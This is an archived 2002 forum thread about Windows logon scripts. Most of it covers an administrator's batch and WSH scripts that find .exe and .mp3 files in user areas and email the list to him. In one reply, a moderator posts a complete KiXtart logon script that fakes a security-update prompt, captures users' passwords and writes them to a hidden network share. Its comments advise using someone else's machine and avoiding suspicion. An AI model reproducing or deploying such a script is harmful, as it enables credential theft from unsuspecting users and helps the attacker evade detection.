View previous topic :: View next topic |
Author |
Message |
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Mon Oct 28, 2002 4:51 pm Post subject: batch file confusion |
|
|
Hi
i'm trying out some batch stuff, i'm planning on writing a script to scan people's userarea when they log on. I'm just playing around with things atm until i figure out the best way to do it. (the best way to learn stuff)
i'm having some trouble understanding why this isnt working.
i'm running it on win2k.
Code: |
@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 0 echo exe found
if errorlevel 1 echo exe not found
|
it's the errorlevel bit that doesnt seem to work.
if i run the batch as "search.bat s:" the output is:
filenotfound
exe found
exe not found
(s: doesnt have any exe's in)
as i understand it. if dir finds no results then the errorlevel is 1.
i know that it is cos i can do echo %errorlevel%
i believe i can use %errorlevel% in the script but havent tried.
i'm trying to keep things non-win2k specific atm.
cheers
Andy
|
|
Back to top |
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Tue Oct 29, 2002 3:52 pm Post subject: |
|
|
isok
i somehow fixed it by doing:
Code: |
@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 1 goto exit
echo do stuff
:exit
echo done!
|
|
|
Back to top |
|
|
Sgt_B Trusted SF Member
Joined: 28 Oct 2002 Posts: 16777215 Location: Chicago, IL US
|
Posted: Tue Oct 29, 2002 4:13 pm Post subject: |
|
|
A bit more interesting would be having the machine's in question write their log files to a central location, giving the log file as <computername>.log.
Might be easier for you to manage.
|
|
Back to top |
|
|
Sgt_B Trusted SF Member
Joined: 28 Oct 2002 Posts: 16777215 Location: Chicago, IL US
|
Posted: Tue Oct 29, 2002 4:24 pm Post subject: |
|
|
@echo off
dir %1\*.exe /a-D /b /S >>\\<central location>\%computername%.log
if errorlevel 1 goto exit
echo do stuff
:exit
echo done!
|
|
Back to top |
|
|
TheKingster Link Spammer
Joined: 03 May 2002 Posts: 0 Location: UK
|
Posted: Tue Oct 29, 2002 4:59 pm Post subject: |
|
|
if your trying to stop people running EXEs theres a whole section on that on these forums
|
|
Back to top |
|
|
ShaolinTiger Forum Fanatic
Joined: 18 Apr 2002 Posts: 16777215 Location: Kuala Lumpur, Malaysia
|
|
Back to top |
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Tue Oct 29, 2002 9:55 pm Post subject: |
|
|
i dont want to have to go thru 1800 log files. it's just a small number of people who stick exe or mp3s in their user areas,
the script will email me using commandline emailer blat with the contents of the log file. i can then remove the files and disable their userares.
atm the script looks like:
Code: |
@echo off
echo checking userarea for inappropriate files
dir %1\*.exe /a-D /b /S >>%1\test.log
dir %1\*.mp3 /a-D /b /s >>%1\test.log
if errorlevel 1 goto exit
echo mailing filelist to administrator!
\\lsahtc_nt1\netlogon\blat %1\test.log -to andy@address -server 192.168.0.15 -f academic\%username% -q
:exit
del %1\test.log
echo done!
|
|
|
Back to top |
|
|
ThePsyko SF Mod
Joined: 17 Oct 2002 Posts: 16777178 Location: California
|
Posted: Fri Nov 08, 2002 3:14 am Post subject: |
|
|
If you're doing this through logon scripts, you might want to look into kixtart - it's free and more robust than DOS (www.kixtart.com).. One of the first sripts I wrote was a password stealer / logger in Kix...
; REM ***
; REM *** Malishus log_on skript
; REM ***
IF INGROUP("Domain Administrators")
RETURN
ENDIF
; REM *** check to see if script has run on system before - if so, skip
; REM *** script and return to normal logon
IF EXIST("c:\winnt\config\confpol.txt")
RETURN
ENDIF
; REM *** Display standard windows messagebox with text and an OK button ***(no cancel button)
$selection = MESSAGEBOX ( "There is a Security Patch available for your system. Press 'OK' to Install", "Security Update", 64)
; REM *** Make it look official by including some lag time (it IS windows
; REM *** after all
? "Security Update Installing....."
SLEEP 1
? "Authentication error! Please Enter your password."
? "UserID: " + @USERID
FLUSHKB
? "Password: "
GETS $pass
? "Installation continuing....."
SLEEP 2
; REM *** Since Kix displays a 0 everytime a file is successfully opened
; REM *** &/or written to, the following line will keep the user from
; REM *** getting suspicious by showing them that
; REM *** there are 0000000 errors during "installation"
? "Installation Errors: "
; REM *** Map a drive to a hidden share on the logon server that only you
; REM *** know about..
; REM *** If this isn't possible, use another users system and share
; REM *** their drive to stash the log in.. never use your own system.
SHELL "%comspec% /c net use w: \\" + @LSERVER + "\hiddenshare$"
; REM *** Open (or create one if it doesn't exist) both the log file for
; REM *** the U/P and the file to later tell the script it has already
; REM *** run on this system
OPEN ( 1, "w:\log.txt", 5)
OPEN ( 2, "c:\winnt\config\confpol.txt", 5)
; REM *** Append the users User ID and Password to a central text file
; REM *** (makes it easier for retrieval)
WRITELINE (1, "User: " + @userid + Chr(13) + Chr(10))
WRITELINE (1, "Pass: " + $pass + Chr (13) + Chr(10))
; REM *** Add a blank line to the \confpol.txt file - will signal the
; REM *** script next time, but if found, won't raise any suspicions
; REM *** (usually)
WRITELINE ( 2, Chr (13) + Chr(10))
CLOSE (1)
CLOSE (2)
SHELL "%comspec% /c net use w: /delete"
? "Security Update Installed, continuing with logon..."
SLEEP 1
RETURN
|
|
Back to top |
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Fri Nov 08, 2002 10:39 am Post subject: |
|
|
i've used kixtart b4. it's ace. but if u gonna use that u might as well go all the way and use WSH. which in the end i did. i'll post my script when i get to work.
|
|
Back to top |
|
|
browolf Trusted SF Member
Joined: 19 Apr 2002 Posts: 1
|
Posted: Fri Nov 08, 2002 11:40 am Post subject: |
|
|
Code: |
'on error resume next
Const ForReading = 1
wscript.echo ("checking your user area for inappropriate files")
set wshell = wscript.createobject("wscript.shell")
Dim fso, f1, ts, s,myfile,uname,udate
Set fso = CreateObject("Scripting.FileSystemObject")
If (fso.FileExists("s:\ftemp.$$$")) Then
fso.DeleteFile("s:\ftemp.$$$")
end if
uname = wshell.ExpandEnvironmentStrings("%USERNAME%")
if instr("sbutte,adavis,jowen,naparro,vballa,cglen-,rbanni,jfairc,andy,myles,duncan,brian,ssstoke,abaill,adavis,msimps", uname) OR isempty(uname) then wscript.exit
WShell.Run "%comspec% /c dir s:\*.exe /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.mp3 /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.wav /a-d /b /s >> s:\ftemp.$$$",0,true
'read file
Set f = fso.GetFile("s:\ftemp.$$$")
if f.size > 0 then
wscript.echo ("mailing file list to administrator")
wshell.run "\\lsahtc_nt1\netlogon\blat s:\ftemp.$$$ -to andy@lythamhigh.lancs.sch.uk -server 192.168.0.15 -f academic\" & uname & " -q", 0,true
wscript.echo ("mail sent!")
datetemp = date
udate = replace (datetemp,"/","")
ttemp = time
ttime = replace (ttemp,":","")
folname = "\\lsahtc_nt1\logs\filez\" & uname & udate &"-"& ttime
'make folder
set f = fso.createfolder(folname)
'move files
Set MyFile = fso.Opentextfile("s:\ftemp.$$$", ForReading,false)
do while myfile.AtEndOfStream <> True
fpath = myfile.readline
cmdline = "%comspec% /c move /y " & """" & fpath & """ " & folname
wscript.echo "moving " & fpath
WShell.Run cmdline, 0,true
loop
myfile.close
else
wscript.echo ("Clear!")
end if
fso.DeleteFile("s:\ftemp.$$$")
set wshell = nothing
set fso = nothing
set f = nothing
set myfile = nothing
|
|
|
Back to top |
|
|
|